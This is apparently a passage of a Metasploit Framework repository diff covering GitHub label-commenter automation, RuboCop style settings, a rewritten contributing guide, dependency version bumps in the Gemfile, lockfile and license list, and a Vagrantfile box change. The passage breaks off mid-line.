automatic module_metadata_base.json update

Land #13143 , fix broken redis_unauth_exec check in msfconsole
Land #13144 , update to faraday 1.0.0
2020-03-26 07:31:06 -05:00 · 2020-03-26 12:21:26 +00:00 · 2020-03-26 12:12:36 +00:00 · 2020-03-26 10:36:13 +00:00 · 2020-03-25 16:25:50 -05:00 · 2020-03-25 16:16:04 -05:00
488 changed files with 18694 additions and 4615 deletions
@@ -0,0 +1,15 @@
+labels:
+  - name: needs-docs
+    labeled:
+      pr:
+        body: |
+          Thanks for your pull request, before this can be merged - corresponding documentation for your module is required:
+          - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+          - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+          - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
+        action: open
+    unlabeled:
+      issue:
+        body: |
+          Thank you for adding module documentation :tada:
+        action: open
@@ -0,0 +1,29 @@
+#
+# Automatically respond to any issues/pull requests that have the given labels assigned.
+#
+name: Label Commenter
+
+on:
+  issues:
+    types:
+      - labeled
+      - unlabeled
+  pull_request:
+    types:
+      - labeled
+      - unlabeled
+
+jobs:
+  comment:
+    runs-on: ubuntu-18.04
+    steps:
+      - uses: actions/checkout@v2
+        with:
+          ref: master
+
+      - name: Label Commenter
+        # Note: Using SHA explicitly for v1.2.3 - https://julienrenaux.fr/2019/12/20/github-actions-security-risk/
+        uses: peaceiris/actions-label-commenter@93941f8f189a4b92ab75059aa39fe421469253f4
+        with:
+          github_token: ${{ secrets.GITHUB_TOKEN }}
+          config_file: .github/label-commenter-config.yml
@@ -11,6 +11,16 @@
 AllCops:
  TargetRubyVersion: 2.4

+require:
+  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
+  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+
+Layout/ModuleHashOnNewLine:
+  Enabled: true
+
+Layout/ModuleDescriptionIndentation:
+  Enabled: true
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
@@ -59,6 +69,25 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

+Layout/FirstArgumentIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/ArgumentAlignment:
+  Enabled: true
+  EnforcedStyle: with_first_argument
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementLineBreak:
+  Enabled: true
+  Description: 'Enforce consistency by breaking hash elements on to new lines'
+
 Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
  Description: 'Almost all module metadata have space in brackets'
@@ -93,26 +122,26 @@ Style/TrailingCommaInArrayLiteral:

 Metrics/LineLength:
  Description: >-
-                  Metasploit modules often pattern match against very
-                  long strings when identifying targets.
+    Metasploit modules often pattern match against very
+    long strings when identifying targets.
  Enabled: true
  Max: 180

 Metrics/BlockLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

 Metrics/MethodLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

-Naming/MethodParameterName:            
+Naming/MethodParameterName:
  Enabled: true
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2
@@ -126,13 +155,10 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/HashAlignment:
-  Enabled: false
-  Description: 'aligning info hashes to match these rules is almost impossible to get right'
-
-Layout/EmptyLines:
-  Enabled: false
-  Description: 'these are used to increase readability'
+Layout/FirstArrayElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful to force values within the register_options array to have sane indentation'

 Layout/EmptyLinesAroundClassBody:
  Enabled: false
@@ -142,19 +168,24 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/ParameterAlignment:
+Layout/ExtraSpacing:
+  Description: 'Do not use unnecessary spacing.'
  Enabled: true
-  EnforcedStyle: 'with_fixed_indentation'
-  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+  # When true, allows most uses of extra spacing if the intent is to align
+  # things with the previous or next line, not counting empty lines or comment
+  # lines.
+  AllowForAlignment: false
+  # When true, allows things like 'obj.meth(arg)  # comment',
+  # rather than insisting on 'obj.meth(arg) # comment'.
+  # If done for alignment, either this OR AllowForAlignment will allow it.
+  AllowBeforeTrailingComments: false
+  # When true, forces the alignment of `=` in assignments on consecutive lines.
+  ForceEqualSignAlignment: false

 Style/For:
  Enabled: false
  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'

-Style/StringLiterals:
-  Enabled: false
-  Description: 'Single vs double quote fights are largely unproductive.'
-
 Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'
@@ -163,6 +194,22 @@ Style/IfUnlessModifier:
  Enabled: false
  Description: 'This style might save a couple of lines, but often makes code less clear'

+Style/PercentLiteralDelimiters:
+  Description: 'Use `%`-literal delimiters consistently.'
+  Enabled: true
+  # Specify the default preferred delimiter for all types with the 'default' key
+  # Override individual delimiters (even with default specified) by specifying
+  # an individual key
+  PreferredDelimiters:
+    default: ()
+    '%i': '[]'
+    '%I': '[]'
+    '%r': '{}'
+    '%w': '[]'
+    '%W': '[]'
+    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
+  VersionChanged: '0.48.1'
+
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -1,64 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are multiple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 

-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!

 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.

-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

@@ -99,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -8,7 +8,7 @@ gem 'sqlite3', '~>1.3.0'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  gem 'simplecov'
+  gem 'simplecov', '0.18.2'
 end

 group :development do
@@ -17,9 +17,13 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry'
+  gem 'pry-byebug'
  # module documentation
  gem 'octokit'
+  # memory profiling
+  gem 'memory_profiler'
+  # cpu profiling
+  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  #gem 'metasploit-aggregator'
@@ -36,6 +40,7 @@ group :development, :test do
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  gem 'rubocop'
  gem 'swagger-blocks'
 end

@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.72)
+    metasploit-framework (5.0.82)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -17,18 +17,19 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday (<= 0.17.0)
+      faraday
      faye-websocket
      filesize
+      hrr_rb_ssh (= 0.3.0.pre2)
      jsobfu
      json
      metasm
      metasploit-concern (~> 2.0.0)
      metasploit-credential (~> 3.0.0)
      metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.3.84)
+      metasploit-payloads (= 1.3.86)
      metasploit_data_models (~> 3.0.10)
-      metasploit_payloads-mettle (= 0.5.16)
+      metasploit_payloads-mettle (= 0.5.20)
      mqtt
      msgpack
      nessus_rest
@@ -116,33 +117,35 @@ GEM
    arel (6.0.4)
    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
+    ast (2.4.0)
    aws-eventstream (1.0.3)
-    aws-partitions (1.267.0)
-    aws-sdk-core (3.89.1)
+    aws-partitions (1.287.0)
+    aws-sdk-core (3.92.0)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.137.0)
+    aws-sdk-ec2 (1.151.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.32.0)
+    aws-sdk-iam (1.34.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.28.0)
+    aws-sdk-kms (1.30.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.60.1)
+    aws-sdk-s3 (1.61.1)
      aws-sdk-core (~> 3, >= 3.83.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.0)
+    aws-sigv4 (1.1.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.4)
+    bindata (2.4.6)
    bit-struct (0.16)
    builder (3.2.4)
+    byebug (11.1.1)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
@@ -170,7 +173,7 @@ GEM
      railties (>= 4.2.0)
    faker (2.2.1)
      i18n (>= 0.8)
-    faraday (0.17.0)
+    faraday (1.0.0)
      multipart-post (>= 1.2, < 3)
    faye-websocket (0.10.9)
      eventmachine (>= 0.12.0)
@@ -178,9 +181,12 @@ GEM
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
+    hrr_rb_ssh (0.3.0.pre2)
+      ed25519 (~> 1.2)
    http_parser.rb (0.6.0)
    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
+    jaro_winkler (1.5.4)
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
@@ -188,6 +194,7 @@ GEM
    loofah (2.4.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
+    memory_profiler (0.9.14)
    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
@@ -207,7 +214,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.84)
+    metasploit-payloads (1.3.86)
    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -218,26 +225,29 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.16)
+    metasploit_payloads-mettle (0.5.20)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.14.0)
    mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
    multipart-post (2.1.1)
    nessus_rest (0.1.6)
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.7)
+    nokogiri (1.10.9)
      mini_portile2 (~> 2.4.0)
-    octokit (4.15.0)
+    octokit (4.18.0)
      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
+    parallel (1.19.1)
+    parser (2.7.0.4)
+      ast (~> 2.4.0)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
    pdf-reader (2.4.0)
@@ -255,8 +265,11 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
+    pry-byebug (3.8.0)
+      byebug (~> 11.0)
+      pry (~> 0.10)
    public_suffix (4.0.3)
-    rack (1.6.12)
+    rack (1.6.13)
    rack-protection (1.5.5)
      rack
    rack-test (0.6.3)
@@ -274,9 +287,10 @@ GEM
      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
+    rainbow (3.0.0)
    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.6)
+    recog (2.3.7)
      nokogiri
    redcarpet (3.5.0)
    rex-arch (0.1.13)
@@ -305,9 +319,10 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.84)
+    rex-powershell (0.1.87)
      rex-random_identifier
      rex-text
+      ruby-rc4
    rex-random_identifier (0.1.4)
      rex-text
    rex-registry (0.1.3)
@@ -315,16 +330,17 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.21)
+    rex-socket (0.1.23)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.24)
+    rex-text (0.2.25)
    rex-zip (0.1.3)
      rex-text
+    rexml (3.2.4)
    rkelly-remix (0.0.7)
    rspec (3.9.0)
      rspec-core (~> 3.9.0)
@@ -332,13 +348,13 @@ GEM
      rspec-mocks (~> 3.9.0)
    rspec-core (3.9.1)
      rspec-support (~> 3.9.1)
-    rspec-expectations (3.9.0)
+    rspec-expectations (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
-    rspec-rails (3.9.0)
+    rspec-rails (3.9.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -349,22 +365,31 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.9.2)
+    rubocop (0.80.1)
+      jaro_winkler (~> 1.5.1)
+      parallel (~> 1.10)
+      parser (>= 2.7.0.1)
+      rainbow (>= 2.2.2, < 4.0)
+      rexml
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 1.7)
    ruby-macho (2.2.0)
+    ruby-prof (1.3.1)
+    ruby-progressbar (1.10.1)
    ruby-rc4 (0.1.5)
    ruby_smb (1.1.0)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (2.0.0)
+    rubyzip (2.3.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.17.1)
+    simplecov (0.18.2)
      docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.2)
    sinatra (1.4.8)
      rack (~> 1.5)
      rack-protection (~> 1.4)
@@ -380,11 +405,12 @@ GEM
    thread_safe (0.3.6)
    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.6.1)
+    ttfunk (1.6.2.1)
    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
+    unicode-display_width (1.6.1)
    warden (1.2.7)
      rack (>= 1.0)
    websocket-driver (0.7.1)
@@ -403,14 +429,17 @@ PLATFORMS
 DEPENDENCIES
  factory_bot_rails
  fivemat
+  memory_profiler
  metasploit-framework!
  octokit
-  pry
+  pry-byebug
  rake
  redcarpet
  rspec-rails
  rspec-rerun
-  simplecov
+  rubocop
+  ruby-prof
+  simplecov (= 0.18.2)
  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -9,33 +9,35 @@ addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
+ast, 2.4.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.267.0, "Apache 2.0"
-aws-sdk-core, 3.89.1, "Apache 2.0"
-aws-sdk-ec2, 1.137.0, "Apache 2.0"
-aws-sdk-iam, 1.32.0, "Apache 2.0"
-aws-sdk-kms, 1.28.0, "Apache 2.0"
-aws-sdk-s3, 1.60.1, "Apache 2.0"
-aws-sigv4, 1.1.0, "Apache 2.0"
+aws-partitions, 1.285.0, "Apache 2.0"
+aws-sdk-core, 3.91.1, "Apache 2.0"
+aws-sdk-ec2, 1.151.0, "Apache 2.0"
+aws-sdk-iam, 1.34.0, "Apache 2.0"
+aws-sdk-kms, 1.30.0, "Apache 2.0"
+aws-sdk-s3, 1.61.1, "Apache 2.0"
+aws-sigv4, 1.1.1, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.4, ruby
+bindata, 2.4.6, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
+byebug, 11.1.1, "Simplified BSD"
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "Artistic-2.0, GPL-2.0+, MIT"
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "GPL-2.0, ruby"
+eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
@@ -44,35 +46,40 @@ faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
+hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
+jaro_winkler, 1.5.4, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.3.0, ruby
 loofah, 2.4.0, MIT
+memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.72, "New BSD"
+metasploit-framework, 5.0.82, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.86, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
-metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 0.5.19, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.7, MIT
-octokit, 4.15.0, MIT
+nokogiri, 1.10.9, MIT
+octokit, 4.17.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
+parallel, 1.19.1, MIT
+parser, 2.7.0.4, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.4.0, MIT
@@ -80,17 +87,19 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
+pry-byebug, 3.8.0, MIT
 public_suffix, 4.0.3, MIT
-rack, 1.6.12, MIT
+rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
+rainbow, 3.0.0, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.6, unknown
+recog, 2.3.7, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -101,31 +110,35 @@ rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.84, "New BSD"
+rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.21, "New BSD"
+rex-socket, 0.1.22, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
+rexml, 3.2.4, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
 rspec-core, 3.9.1, MIT
-rspec-expectations, 3.9.0, MIT
+rspec-expectations, 3.9.1, MIT
 rspec-mocks, 3.9.1, MIT
-rspec-rails, 3.9.0, MIT
+rspec-rails, 3.9.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.9.2, MIT
+rubocop, 0.80.1, MIT
 ruby-macho, 2.2.0, MIT
+ruby-prof, 1.3.1, "Simplified BSD"
+ruby-progressbar, 1.10.1, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.0.0, "Simplified BSD"
+rubyzip, 2.3.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.1, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.2, MIT
+simplecov-html, 0.12.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
@@ -135,9 +148,10 @@ thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.6.1, "GPL-2.0, GPL-3.0, Nonstandard"
+ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
+unicode-display_width, 1.6.1, MIT
 warden, 1.2.7, MIT
 websocket-driver, 0.7.1, "Apache 2.0"
 websocket-extensions, 0.1.4, "Apache 2.0"
@@ -3,7 +3,7 @@

 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/xenial64"
+  config.vm.box = "ubuntu/bionic64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
    config.vm.provision "shell", inline: step
  end

-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
